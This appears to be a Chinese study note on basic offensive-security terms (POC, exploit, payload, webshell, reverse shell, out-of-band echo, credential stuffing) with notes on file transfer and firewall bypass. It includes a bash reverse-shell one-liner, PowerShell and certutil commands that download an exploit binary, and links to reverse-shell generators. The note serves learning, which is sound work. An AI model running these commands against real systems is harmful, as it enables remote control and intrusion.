网络安全基本概念
名词注释:
POC:Proof of concept 概念验证 常指一段漏洞证明的代码。证明漏洞存在的代码或步骤。目的是“证实”漏洞确实存在。往往只触发漏洞,而不具备恶意破坏性,主要用于安全测试。
EXP:exploit 漏洞利用 指利用漏洞进行攻击的代码。它的目的是“利用”漏洞达成具体目标(获取系统权限、植入代码),具备攻击性。
POC证明这里有问题,而EXP通过 这里的问题来拿走东西。
payload 载荷 漏洞利用成功后(exp),在目标系统上执行的恶意代码或指令。相当于攻击者真正想做的事,可以是任何动作,如反弹shell,添加用户、下载病毒。
shellcode 外壳代码 特指用于启动命令行Shell(cmd、bash)的特殊payload。由于历史原因(攻击者通常需要获得Shell控制权)而得名。泛指用机器码编写的地城payload
shellcode是payload的一种。通常是exp-shellcode-payload有时混用
后门和webshell是攻击者用于持久化控制目标的常用手段
后门:指绕过正常认证机制隐藏访问系统的方法。广义概念,可以是软件
、账户、脚本,核心是隐藏性与非授权访问。
webshell:特指运行在Web服务器上的后门。通常以网页文件(PHP、JSP、ASP文件)形式存在。它通过HTTP请求接受命令。
后门包括所有维持访问的方式;Webshell是后面在web环境下的具体实现。
后门可能是修改的系统、隐藏账号等;Webshell通常是可访问的Web脚本文件。
后门可以使用自定义协议;webshell通常走HTTP/HTTPS,更容易混入正常流量。
木马 看似正常软件,实则隐藏恶意功能。核心特征是伪装 外挂,不能自我复制,主要目的是窃取数据或留下后门。窃密与控制
病毒 自我复制并感染其他文件的恶意代码。核心特征是感染和传播,它会依附在可执行文件或脚本中,运行时破坏系统或文件。破坏与宣告
现代界限已经模糊,常结合成“木马病毒”,既有伪装性,又有感染性。
反弹 反弹shell 一种由目标主机主动向攻击者发起连接的技术。主要用于突破防火墙限制。常见命令如bash -i >$ /dev/tcp/ip/port 0>&1
回显Echo/output 指令执行后的结果输出。在漏洞利用中,如果结果直接显示在页面上的叫 有回显;如果不显示,则需要用技术手段(dnslog)将数据带出来,这叫带外回显。
反弹是为了拿到一个交互式命令行,实现远程控制;回显是为了看到命令行的结果。
拿到反弹shell后,自然就有回显;但是无回显漏洞(盲注)中,必须借助外部回显技术(如dns解析记录)来读取数据,此时并未建立完整的shell通道。
反弹是建立控制通道的方式,会显是获取数据结果的手段
跳板攻击者利用已攻陷的主机,作为跳转点来访问或攻击内部完了过其他设备的技术。
黑盒测试 没有源代码,只知道目标信息攻击测试
白盒测试 了解代码,服务有什么系统对目标进行攻击测试
暴力破解 攻击者通过系统地尝试所有可能的密码组合,直到找到正确的那个,从而非法获取账户或系统访问权限的过程
社会工程学 攻击的不是服务器,而是人的心理。它指的是通过操纵、影响或欺骗他人,使其泄露敏感信息或执行违背其利益的操作。这通常被认为是绕过复杂安全系统最有效的手段,因为人本身就是最难修补的"漏洞"。
撞库 指的是攻击者使用从某个平台泄露的(用户名、密码)组合,去批量尝试登录其他平台的行为。
ATT&CK 红蓝对抗框架
文件上传下载命令生成
https://forum.ywhack.com/bountytips.php?download
https://forum.ywhack.com/reverse-shell/
常见系统命令
https://blog.csdn.net/weixin_43303273/article/details/83029138
文件权限 服务权限 用户权限
系统用户 用户组 服务用户
自带防火墙出栈入栈规则策略协议 宽出严入 出栈是上网出方向 入栈是是访问本地的服务的流量。
案例1 文件上传下载--解决无图形化数据传输
linux:wget curl python ruby perl java等
windows:powershell certutil bitsadmin msiexec mshta rundll32等
参考前面的网站即可获得
比如linux系统常见文件下载命令
wget http://IP地址/文件名 -O 新文件名
curl http://ip地址/文件名 -o 新文件名
windows系统
powershell.exe -Command "Invoke-WebRequest -Uri http://127.0.0.1:8080/ms10-051.exe -OutFile exploit.exe"
certutil.exe -urlcache -split -f http://127.0.0.1:8080/ms10-051.exe exploit.exe
综合案例1:防火墙绕过-正向连接 反向连接 内网服务器
1 内网:
内网-> xiaodi8
xiaodi8!->内网
2 防火墙
xiaodi8<->ailiyun
xiaodi8防火墙 -> aliyun
aliyun !->xiaodi8防火墙

浙公网安备 33010602011771号